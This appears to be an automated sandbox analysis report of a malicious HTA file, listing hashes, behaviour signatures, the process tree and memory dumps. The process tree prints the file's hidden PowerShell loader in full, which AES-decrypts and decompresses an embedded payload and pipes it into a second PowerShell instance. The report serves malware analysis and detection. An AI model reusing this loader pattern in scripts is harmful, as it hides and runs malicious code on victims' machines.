Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    05-03-2024 02:01

General

  • Target

    06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta

  • Size

    72KB

  • MD5

    e09e50f4c8308806ae21242538e17e88

  • SHA1

    3d5d0f3e384ec93f87716cc49487cd7ef1e8714a

  • SHA256

    06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f

  • SHA512

    a5557c34562a8f2cf1ba07029f07d389788579c4333e0856da1b6b7ba09484015dbfcf8f6f43d3e21787e8ef70b82062d29ebbfaf57fc50ed6d2015b272c7259

  • SSDEEP

    768:fEnAiXp/x27ioVgCtTLalOmilXO3SuDbvq572+/unhi1zOz:Mn/p/x27ioVgCtTLbmweSuPyKti5Oz

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = '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';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2612

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    c3e011120b6ad889373fb7fd8636d767

    SHA1

    452e693b2bb223ee6afda9cb2266f8f02e0135e7

    SHA256

    ad5164bd9309f63da8508380cf58e1f128d8786b78aac0c0fa25a5cd1b7192f9

    SHA512

    0edf1d610e9016b0e0c0bcce6ec2a8f74dec5fa9848b6bc61c05cf4f29df2ce6269e8667f4103cc0633a842589d5b49befe55270608b7f816e1f3f4c3dc0663b

  • memory/2156-2-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2156-3-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2156-4-0x0000000002560000-0x00000000025A0000-memory.dmp

    Filesize

    256KB

  • memory/2156-5-0x0000000002560000-0x00000000025A0000-memory.dmp

    Filesize

    256KB

  • memory/2156-15-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2612-11-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2612-12-0x0000000002600000-0x0000000002640000-memory.dmp

    Filesize

    256KB

  • memory/2612-13-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2612-14-0x0000000074410000-0x00000000749BB000-memory.dmp

    Filesize

    5.7MB